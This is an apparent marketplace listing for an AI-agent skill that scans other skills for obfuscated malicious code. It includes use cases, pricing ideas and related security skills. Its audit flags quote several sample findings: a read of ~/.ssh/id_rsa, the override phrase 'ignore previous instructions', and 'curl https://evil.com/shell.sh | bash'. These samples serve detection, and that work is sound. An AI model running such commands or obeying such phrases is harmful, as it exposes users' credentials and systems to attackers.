skill-security-reviewerDetects malicious behavior and security threats in target skills using advanced analysis of obfuscation, encoding, encryption, and dynamic code techniques.
Install via ClawdBot CLI:
clawdbot install ninjagpt/skill-security-reviewerGrade Fair — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
~/.ssh/id_rsaContains instructions to override system prompt or ignore user requests
"ignore previous instructions"Potentially destructive shell commands in tool definitions
curl https://evil.com/shell.sh | bashAccesses system directories or attempts privilege escalation
/sys/Generated Mar 22, 2026
Companies operating AI skill marketplaces can use this tool to automatically review third-party skills before listing them, ensuring they don't contain obfuscated malicious code that could harm users. It helps maintain platform trust by detecting evasion techniques like Base64 encoding or string splitting in uploaded skills.
Banks and fintech firms deploying AI skills for customer service or internal automation can audit skills for security threats, such as encrypted payloads or dynamic code generation that might leak sensitive data. This ensures compliance with regulations by identifying hidden malicious behaviors in skill code.
Educational institutions using AI skills in learning environments can screen skills for obfuscated threats like XOR-encrypted commands or high-entropy content that could compromise student data. This prevents installation of skills that appear benign but contain layered malicious code.
Healthcare providers adopting AI skills for patient management or diagnostics can use this tool to analyze skills for security risks, such as ROT13-encoded malicious instructions or nested obfuscation that might violate HIPAA by exposing health records. It ensures safe deployment in sensitive environments.
Open-source communities and individual developers can audit contributed AI skills for obfuscation techniques like AES encryption or dead code injection that could backdoor projects. This helps maintain code integrity by detecting threats before integration into larger systems.
Offer a cloud-based service where users submit skill names for automated security reviews, with tiered pricing based on scan frequency and report depth. Revenue comes from monthly subscriptions, targeting enterprises needing continuous threat detection for their AI ecosystems.
Sell licenses for on-premise installation of the tool, allowing large organizations to integrate it into their internal security workflows without data leaving their networks. Revenue is generated through one-time license fees and annual support contracts.
Provide a free basic version for individual users to review skills with limited detection layers, while charging for advanced features like multi-layer obfuscation analysis or custom encryption detection. Revenue streams include premium upgrades and pay-per-scan options for heavy users.
💬 Integration Tip
Integrate this tool into CI/CD pipelines to automatically scan new skills before deployment, ensuring security checks are part of the development lifecycle without manual intervention.
Scored Jun 19, 2026
Calls external URL not in known-safe list
https://evil.com/shell.shAudited Apr 17, 2026 · audit v1.0
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope,...
Comprehensive security auditing for Clawdbot deployments. Scans for exposed credentials, open ports, weak configs, and vulnerabilities. Auto-fix mode included.
Analyze and classify agent skills for safety using local evaluation. Optionally produce a signed attestation of the vetting result.
Audit codebases and infrastructure for security issues. Use when scanning dependencies for vulnerabilities, detecting hardcoded secrets, checking OWASP top 10 issues, verifying SSL/TLS, auditing file permissions, or reviewing code for injection and auth flaws.
Security engineering workflow for OpenClaw privilege governance and hardening. Use for least-privilege execution, approval-first privileged actions, idle tim...
Git 安全扫描器 - 检查提交中的敏感信息泄露(API keys、密码、token)